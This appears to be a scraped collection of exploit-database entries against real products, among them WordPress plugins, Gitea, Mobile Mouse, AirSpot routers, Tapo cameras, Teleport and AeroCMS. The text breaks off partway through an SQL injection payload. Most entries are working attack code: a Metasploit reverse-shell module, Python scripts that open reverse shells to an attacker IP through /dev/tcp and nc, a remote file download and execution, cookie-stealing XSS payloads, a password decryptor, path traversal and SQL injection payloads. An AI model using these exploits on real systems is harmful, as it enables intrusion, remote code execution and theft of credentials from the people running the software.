ISHACK AI BOT

# Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS) # Date: 05/08/2022 # Exploit Author: saitamang , yunaranyancat , syad # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/ # Version: 2.2.6 # Tested on: Centos 7 apache2 + MySQL WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected. Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post payload --> test"/><img/src=""/onerror=alert(document.cookie)> The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.

# Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS) # Date: 08/08/2022 # Exploit Author: saitamang, syad, yunaranyancat # Vendor Homepage: wordpress.org # Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip # Version: 1.0 # Tested on: Centos 7 apache2 + MySQL WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected. Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif The draft post can be viewed using other Editor or Admin account and Stored XSS will be triggered.

# Exploit Title: Gitea Git Fetch Remote Code Execution # Date: 09/14/2022 # Exploit Author: samguy # Vendor Homepage: https://gitea.io # Software Link: https://dl.gitea.io/gitea/1.16.6 # Version: <= 1.16.6 # Tested on: Linux - Debian # Ref : https://tttang.com/archive/1607/ # CVE : CVE-2022-30781 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Gitea Git Fetch Remote Code Execution', 'Description' => %q{ This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affect Gitea before 1.16.7 version. }, 'Author' => [ 'wuhan005 & li4n0', # Original PoC 'krastanoel' # MSF Module ], 'References' => [ ['CVE', '2022-30781'], ['URL', 'https://tttang.com/archive/1607/'] ], 'DisclosureDate' => '2022-05-16', 'License' => MSF_LICENSE, 'Platform' => %w[unix win], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [] } ) ) register_options([ Opt::RPORT(3000), OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('USERNAME', [true, 'Username to authenticate with']), OptString.new('PASSWORD', [true, 'Password to use']), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/user/login'), 'keep_cookies' => true ) return CheckCode::Unknown('No response from the web service') if res.nil? return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200 # Powered by Gitea Version: 1.16.6 unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/)) return CheckCode::Unknown('Target does not appear to be running Gitea.') end if match[:version].match(/[a-zA-Z]/) return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.") end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/user/login'), 'vars_post' => { 'user_name' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) return CheckCode::Safe('Authentication failed') if res&.code != 302 if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6') return CheckCode::Appears("Version detected: #{match[:version]}") end CheckCode::Safe("Version detected: #{match[:version]}") rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def primer ['/api/v1/version', '/api/v1/settings/api', "/api/v1/repos/#{@migrate_repo_path}", "/api/v1/repos/#{@migrate_repo_path}/pulls", "/api/v1/repos/#{@migrate_repo_path}/topics" ].each { |uri| hardcoded_uripath(uri) } # adding resources vprint_status("Creating repository \"#{@repo_name}\"") gitea_create_repo vprint_good('Repository created') vprint_status("Migrating repository") gitea_migrate_repo end def exploit @repo_name = rand_text_alphanumeric(6..15) @migrate_repo_name = rand_text_alphanumeric(6..15) @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}" datastore['URIPATH'] = "/#{@migrate_repo_path}" Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) } cleanup # removing all resources end def get_csrf(cookies) csrf = cookies&.split("; ")&.grep(/_csrf=/)&.join&.split("=")&.last fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf csrf end def gitea_remove_repo(name) vprint_status("Cleanup: removing repository \"#{name}\"") uri = "/#{datastore['username']}/#{name}/settings" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, uri), 'keep_cookies' => true ) res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'action' => 'delete', 'repo_name' => name, '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) vprint_warning('Unable to remove repository') if res&.code != 302 end def gitea_create_repo uri = normalize_uri(target_uri.path, '/repo/create') res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true) @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'uid' => @uid, 'auto_init' => 'on', 'readme' => 'Default', 'repo_name' => @repo_name, 'trust_model' => 'default', 'default_branch' => 'master', '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302 rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def gitea_migrate_repo res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/repo/migrate'), 'keep_cookies' => true ) uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type'] res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, uri), 'keep_cookies' => true ) res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'uid' => @uid, 'service' => svc_type, 'pull_requests' => 'on', 'repo_name' => @migrate_repo_name, '_csrf' => get_csrf(res.get_cookies), 'auth_token' => rand_text_alphanumeric(6..15), 'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}", }, 'keep_cookies' => true ) if res&.code != 302 # possibly triggered by the [migrations] settings err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text gitea_remove_repo(@repo_name) cleanup fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}") end rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def on_request_uri(cli, req) case req.uri when '/api/v1/version' send_response(cli, '{"version": "1.16.6"}') when '/api/v1/settings/api' data = { 'max_response_items':50,'default_paging_num':30, 'default_git_trees_per_page':1000,'default_max_blob_size':10485760 } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}" data = { "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}", "owner": { "login": datastore['username'] } } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1" send_response(cli, '{"topics":[]}') when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all" data = [ { "base": { "ref": "master", }, "head": { "ref": "--upload-pack=#{payload.encoded}", "repo": { "clone_url": "./", "owner": { "login": "master" }, } }, "updated_at": "2001-01-01T05:00:00+01:00", "user": {} } ] send_response(cli, data.to_json) end end end

# Exploit Title: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE) # Date: Aug 09, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: 3.6.0.4 # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse help = " Mobile Mouse 3.6.0.4 Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload") parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default Port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8') hex_shell = download_string.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print ("Executing The Command Shell...") sleep(1.2) RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN2) run2 = s.recv(54) shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') hex_run = shell_string.hex() RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04") s.send(RUN3) run3 = s.recv(96) print (" Take The Rose") sleep(10) s.close()

# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE) # Date: 7/26/2022 # Exploit Author: Samy Younsi (NSLABS) (https://samy.link) # Vendor Homepage: https://www.airspan.com/ # Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf # Version: 0.3.4.1-4 and under. # Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu) # CVE : CVE-2022-36267 from __future__ import print_function, unicode_literals import argparse import requests import urllib3 urllib3.disable_warnings() def banner(): airspanLogo = """ ,-. / \ `. __..-,O : \ --''_..-'.' | . .-' `. '. : . .`.' \ `. / .. \ `. ' . `, `. \ ,|,`. `-.\ '.|| ``-...__..-` | | Airspan |__| AirSpot 5410 /||\ PWNED x_x //||\\ // || \\ __//__||__\\__ '--------------'Necrum Security Labs \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(airspanLogo)) def pingWebInterface(RHOST, RPORT): url = 'https://{}:{}'.format(RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=30) if response.status_code != 200: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() print('[INFO] Airspan device web interface seems reachable!') except: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() def execReverseShell(RHOST, RPORT, LHOST, LPORT): payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT) data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload) try: print('[INFO] Executing reverse shell...') response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False) print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT)) return except Exception as e: print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT) return False def main(): banner() args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main()

# Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass # Date: 2022-08-11 # Exploit Author: JORDAN GLOVER # Type: WEBAPPS # Platform: HARDWARE # Vendor Homepage: https://www.buffalotech.com/ # Model: TeraStation Series # Firmware Version: 1.66 # Tested on: Windows 10 An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges. The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS. Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body. If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS. POC #1 Authentication Failure Request POST /dynamic.pl HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/static/index.html bufaction=verifyLogin&user=Jordan&password=Jordan Response HTTP/1.1 200 OK Content-type: text/html Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Date: Mon, 30 Jun 2008 02:39:51 GMT Server: lighttpd/1.4.32 Content-Length: 94 {"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]} Incorrect Username or Password POC #2 Authentication Success Request POST /dynamic.pl HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/static/index.html bufaction=verifyLogin&user=Jordan&password=Jordan Intercepted Response HTTP/1.1 200 OK Content-type: text/html Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Date: Mon, 30 Jun 2008 02:39:51 GMT Server: lighttpd/1.4.32 Content-Length: 94 {"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]} Login Successful

# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass # Date: 2022-08-4 # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm # Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3 # Version: <= 4.0.3 # Tested on: MacOS Monterey # CVE: CVE-2022-2651 # Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/ Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection # Steps to reproduce: 1. Create a acount with victims email id 2. When the account is created, its ask for email confirmation via validating OTP Endpoint: https://site/confirm-email 3. Enter any random OTP and try to perfrom bruteforce attack and if otp matches, We can takeover that account

// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption // Date: 2022-08-12 // Exploit Author: p1ckzi // Vendor Homepage: https://thingm.com/ // Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7 // Vulnerable Version: blink1control2 <= 2.2.7 // Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11. // CVE: CVE-2022-35513 // // Description: // the blink1control2 app (versions <= 2.2.7) utilises an insecure method // of password storage which can be found by accessing the /blink1/input url // of the api server. // password ciphertext for skype logins and email are listed // and can be decrypted. example usage: // node blink1-pass-decrypt <ciphertext> #!/usr/bin/env node const {ArgumentParser} = require('argparse'); const simpleCrypt = require('simplecrypt'); function exploit() { const BANNER = '\033[36m\n\ _ _ _ _ _\n\ | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\ | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\ | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\ |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\ |_|\n\ _ _\n\ __| | ___ ___ _ __ _ _ _ __ | |_\n\ / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\ | (_| | __| (__| | | |_| | |_) | |_\n\ \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\ |___/|_|\033[39m'; const PARSER = new ArgumentParser({ description: 'decrypts passwords found at the /blink/input url ' + 'of the blink1control2 api server (version <= 2.2.7 ).' }); PARSER.add_argument('ciphertext', { help: 'encrypted password string to use', type: 'str' }); let args = PARSER.parse_args(); // supplied ciphertext is decrypted with same salt, password, and method // used for encryption: try { let crypt = simpleCrypt({ salt: 'boopdeeboop', password: 'blink1control', method: 'aes-192-ecb' }); let ciphertext = args.ciphertext; let decrypted = crypt.decrypt(ciphertext); console.log(BANNER); console.log('\033[32m[+] decrypted password:\033[39m'); console.log(decrypted); } catch (TypeError) { console.log('\033[33m[!] the submitted hash was invalid.\033[39m'); } finally { process.exit(1); } } exploit()

# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion # Date: Aug 13, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: http://www.savysoda.com # Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976 # Version: 11 # Tested on: iPhone OS 15_5 # Proof of Concept GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: 192.168.1.100 Connection: close Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1 Referer: http://192.168.1.103/ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate ----------------- HTTP/1.1 200 OK Content-Disposition: attachment Content-Type: application/download Content-Length: 213 Accept-Ranges: bytes Date: Sat, 13 Aug 2022 03:33:30 GMT ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE) # Date: 15-08-2022 # Author: Febin # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.4 # Tested on: Windows 10 #!/bin/bash printf " WiFiMouse / MouseServer 1.8.3.4 Exploit by FEBIN " printf "[*] Enter the Target IP Address: " read TARGET rce(){ printf "[*] Enter the Command to execute on the Target: " read CMD sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978 } dirlist(){ echo "[*] User's Home Directory Contents:" echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2- while $true do printf "\nList Directory:> " read DIR echo "[+] Contents of $DIR: " echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2- done } printf " [1] Remote Command Execution [2] Directory Listing " printf "Enter Your Choice (1 or 2) : " read CHOICE if [[ $CHOICE == "1" ]] then rce elif [[ $CHOICE == "2" ]] then dirlist else echo "[-] Invalid Choice!" fi

# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) # Date: 02/11/2022 # Exploit Author: hacefresko # Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = 1337 REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version) if len(sys.argv) < 3: print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>") exit() victim = sys.argv[1] attacker = sys.argv[2] print("[+] Listening on %d" % PORT) t = threading.Thread(target=os.system, args=(NC_COMMAND,)) t.start() print("[+] Serving payload to %s\n" % victim) url = "https://" + victim + ":443/" json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}} requests.post(url, json=json, verify=False)

# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 22-08-2022 # Exploit Author: yuyudhn # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1. Login using admin account at http://feehi-cms.local/admin 2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex 3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate 4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php. 5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php # Burp request example: POST /admin/index.php?r=ad%2Fcreate HTTP/1.1 Host: feehi-cms.local Content-Length: 1530 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://feehi-cms.local Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D Connection: close ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="_csrf_backend" FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg== ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[name]" rce ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[tips]" rce at Ad management ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[input_type]" 1 ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]" ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php" Content-Type: image/png <?php phpinfo(); ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[link]" --------------

# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE) # Date: 08/01/2022 # Exploit Author: Brandon Roach & Brian Landrum # Vendor Homepage: https://goteleport.com # Software Link: https://github.com/gravitational/teleport # Version: < 10.1.2 # Tested on: Linux # CVE: CVE-2022-36633 Proof of Concept (payload): https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2= f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3= 0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?= method=3Diam Decoded payload: " /bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

# Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: Debian / WordPress 6.0.1 # CVE : CVE-2022-2941 # Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c # 1. Technical Description: The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page. # 2. Proof of Concept (PoC): a. Install and activate version 2.88.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings). c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use the following payload: <script>alert(/XSS/)</script> d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload will be executed. Note: This change will be permanent until you modify the edited fields.

# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://profiles.wordpress.org/3dady/ # Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.0.1 # CVE : N/A # 1. Technical Description: The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady). c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text): " autofocus onfocus=alert(/XSS/)> d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed. Note: This change will be permanent until you modify the edited fields.

# Title: Aero CMS v0.0.1 - SQLi # Author: nu11secur1ty # Date: 08.27.2022 # Vendor: https://github.com/MegaTKC # Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1 # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi # Description: The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: author (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT 